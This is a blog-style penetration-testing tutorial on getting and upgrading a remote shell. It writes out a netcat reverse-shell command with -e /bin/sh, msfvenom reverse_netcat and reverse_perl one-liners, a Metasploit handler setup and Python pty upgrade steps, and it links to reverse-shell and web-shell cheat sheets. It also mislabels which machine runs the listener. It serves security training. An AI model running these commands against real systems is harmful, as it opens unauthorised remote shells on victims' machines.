Penetration Testing Step by Step: Uploading Shellcode and Upgrading the Shell

Getting a Remote Shell

Let’s assume you’ve found some sort of access to your target, ideally an upload vulnerability that will let you get some shellcode onto the target.

Netcat

You could just start a Netcat listener on the victim, if Netcat is available:

nc -lvnp 1234

… and start a shell on the attack box, as long as Netcat in a version that supports -e is available on it:

nc -e /bin/sh 192.168.0.10 1234  

That should get you a shell, and if -e works, it’ll even be a good Bash shell.

Shellcode Resources

You can find all kinds of cool reverse shell code at Pentest Monkey:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

See these detailed instructions for a PHP reverse shell:
http://pentestmonkey.net/tools/web-shells/php-reverse-shell.
This is a nice illustration of setting up the listener, etc.

And if you need to start with a web shell the Monkey has them here:
http://pentestmonkey.net/category/tools/web-shells

Msfvenom

But since we’re in Metasploit, it’s handy to use Metasploit’s msfvenom to generate the commands for us. Metasploit has several payloads under “cmd/unix” that can be used to generate one-liner bind or reverse shells at
/usr/share/metasploit-framework/modules/payloads/singles/cmd/unix. Note that there are payloads for windows (and mainframes, who knows why) as well.

Often your limits are what’s supported on the target.

For instance, this payload can be used if the -e flag isn’t available in Netcat:

msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.0.10 LPORT=1234 R

And here’s a Perl example to use if Netcat isn’t installed:

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.0.10 LPORT=1234 R

On any msfvenom attack, you’ll need to set up a listener on the attack machine:

msf > use exploit/multi/handler
msf > set PAYLOAD <Payload name>
msf > set LHOST <LHOST value>
msf > set LPORT <LPORT value>
msf > set ExitOnSession false
msf > exploit -j -z

Once you’ve set required options, the following command will execute your handler:

msf > msfconsole -L -r

Spawn a Bash Shell from Python

This Python command will get you a real pty once you’ve got a reverse shell opened. In that shell, enter:

echo $TERM # to get the xterm type, rows and columns to use below

python -c 'import pty; pty.spawn("/bin/bash");'
CTL-Z # or bg to background the above

stty raw -echo

fg # get back to our shell

reset

export SHELL=bash

export TERM=xterm256-color

stty rows 38 columns 116

— Above from this very nice tutorial:
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/.
Also look at the socat alternative on this page.

For succinct example code for several platforms, see this great cheatsheet/page:
https://netsec.ws/?p=331

And as always check out OffSec’s own page:
https://www.offensive-security.com/metasploit-unleashed/msfvenom/

 

 

Leave a Reply